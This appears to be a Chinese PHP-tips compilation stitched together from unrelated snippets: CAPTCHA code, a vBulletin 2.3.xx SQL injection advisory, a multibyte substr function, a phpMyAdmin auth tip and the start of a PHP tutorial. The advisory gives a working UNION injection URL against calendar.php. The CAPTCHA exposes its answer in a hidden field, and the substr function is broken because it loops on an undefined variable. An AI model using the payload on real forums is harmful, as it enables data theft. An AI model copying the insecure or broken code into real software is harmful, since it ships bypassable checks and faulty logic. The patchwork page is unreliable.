图形数字验证代码

图形数字验证代码
Code:
 
<?
/*
* Filename: authpage.php
*/
srand((double)microtime()*1000000);
//验证用户输入是否和验证码一致
if(isset($_POST['authinput']))
{
if(strcmp($_POST['authnum'],$_POST['authinput'])==0)
echo "验证成功！";
else
echo "验证失败！";
}
//生成新的四位整数验证码
while(($authnum=rand()%10000)<1000);
?>
<form action=authpage.php method=post>
<table>
请输入验证码：<input type=text name=authinput style="width: 80px"><br>
<input type=submit name="验证" value="提交验证码">
<input type=hidden name=authnum value=<? echo $authnum; ?>>
<img src=authimg.php?authnum=<? echo $authnum; ?>>
</table>
</form>
-------------------------------------------------------------------------------------------------------------
<?
/*
* Filename: authimg.php
*/
//生成验证码图片
Header("Content-type: image/PNG");
srand((double)microtime()*1000000);
$im = imagecreate(58,28);
$black = ImageColorAllocate($im, 0,0,0);
$white = ImageColorAllocate($im, 255,255,255);
$gray = ImageColorAllocate($im, 200,200,200);
imagefill($im,68,30,$gray);
//将四位整数验证码绘入图片
imagestring($im, 5, 10, 8, $HTTP_GET_VARS['authnum'], $white);
for($i=0;$i<50;$i++) //加入干扰象素
{
imagesetpixel($im, rand()%70 , rand()%30 , $gray);
}
ImagePNG($im);
ImageDestroy($im);

vBulletin Forum 2.3.xx SQL Injection
There exist a sql injection problem in calendar.php.
-------- Cut from line 585 in calendar.php ----------
else if ($action == "edit")
{
        $eventinfo = $DB_site->query_first("SELECT allowsmilies,public,userid,
eventdate,event,subject FROM calendar_events WHERE eventid = $eventid");
-----------------------------------------------------
If the MySQL version is greater than 4.00, a UNION attack could be used.
-----------------------------------------
http://ww.xxx.com/bbs/calendar.php?action=edit&eventid=12%20union%20(SELECT%20allowsmilies,public,userid,'0000-0-0',user(),version()%20FROM%20calendar_ev
ents%20WHERE%20eventid%20=%2013)%20order%20by%20eventdate
-----------------------------------------
The query_first function will only return the first row of the query result, so make sure it returns !
the one you want.


substr()函数中文版
普通的substr()函数可以取得字符串的指定长度子字符串，但遇到中文时可能会在新字符串末尾产生乱码，下面这个函数将超过$len长度的字符串转换成以“...”结尾，并且去除了乱码。
用法：$new = getsubstring($old,20);
function getsubstring($str,$len)
{
    for($i = 0;$i <$end;$i++)
    {
            if ($i >=0 AND $i <$end)
            {
                  if(ord(substr($str,$i,1)) > 0xa1)    
                        $result_str.=substr($str,$i,2);
                  else
                        $result_str.=substr($str,$i,1);
            }
            if(ord(substr($str,$i,1)) > 0xa1)
                  $i++;
    }
    if(strlen($str)<=$end)
            return $result_str;
    else
            return $result_str."...";
}

如何给phpadmin一个保护
如何给phpadmin一个保护，即要输入密码才能进入phpadmin  
---------------------------------------------------------------  
 
在config.inc.php中:  
$cfgServers[$i]['auth_type']          =  'cookie';        //  Authentication  method  (config,  http  or  cookie  based)?  
 
有三种选择config  http  cookie  
config  :  按配置文件中的密码  (也就是标准方式)  这种方式没有认证  
http  :  使用HTTP认证  
cookie  :  使用COOKIE登录认证  
 
如果是使用IIS+PHP是没有办法使用HTTP认证的.这个功能只有在使用APACHE+模块安装的PHP上才能使用.  
你使用COOKIE方式吧,安全性也是很好的呀.    

PHP是一种易于学习和使用的服务器端脚本语言。只需要很少的编程知识你就能使用PHP建立一个真正交互的WEB站点。本教程并不想让你完全了解这种语言，只是能使你尽快加入开发动态web站点的行列。我假定你有一些HTML（或者HTML编辑器）的基本知识和一些编程思想。
1.简介
PHP是能让你生成动态网页的工具之一。PHP网页文件被当作一般HTML网页文件来处理并且在编辑时你可以用编辑HTML的常规方法编写PHP。
PHP代表：超文本预处理器（PHP: Hypertext Preprocessor）。PHP是完全免费的，不用花钱，你可以从PHP官方站点(http://www.php.net)自由下载。PHP遵守GNU公共许可（GPL)，在这一许可下诞生了许多流行的软件诸如Linux和Emacs。你可以不受限制的获得源码，甚至可以从中加进你自己需要的特色。PHP在大多数Unix平台，GUN/Linux和微软Windows平台上均可以运行。怎样在Windows环境的PC机器或Unix机器上安装PHP的资料可以在PHP官方站点上找到。安装过程很简单。
如果你的机器解决了2000问题，那么PHP也一样没有千年虫问题！ 
1.1 历史
三年前，Rasmus Lerdorf为了创建他的在线简历而创造了"个人主页工具"（Personal Home Page Tools）。这是一种非常简单的语言。其后越来越多的人们注意到了这种语言并对其扩展提出了各种建议。在许多人的无私奉献下以及这种语言本身的源代码自由性质，它演变成为一种特点丰富的语言，而且现在还在成长中。
PHP虽然很容易学习，但是速度上比mod_perl（植入web服务器的perl模块）慢。现在有了可以与mod_perl速度想媲美的被称作Zend的新引擎，而PHP4就可以充分利用这个引擎。PHP4还处在BETA测试阶段。Andy Gutmans和Zeev Suraki是Zend的主要作者。可以去Zend站点(http://www.zend.com)了解更多。
PHP的应用在个人性质的web工程中增长显著。根据Netcraft在1999年10月的报告，有931122个域和321128个IP地址利用PHP技术。
1.2 PHP的先进之处
应用PHP有许多好处。当然已知的不利之处在于PHP由于是开放源码项目，没有什么商业支持，并且由此而带来的执行速度缓慢（直到PHP4之前）。但是PHP的邮件列表很是有用而且除非你正在运行像Yahoo!或者Amazon.com这样的极受欢迎的站点，你不会感觉出PHP的速度与其他的有什么不同。最起码我就没有感觉出来！好了，让我们来看看PHP有那些优点：
- 学习过程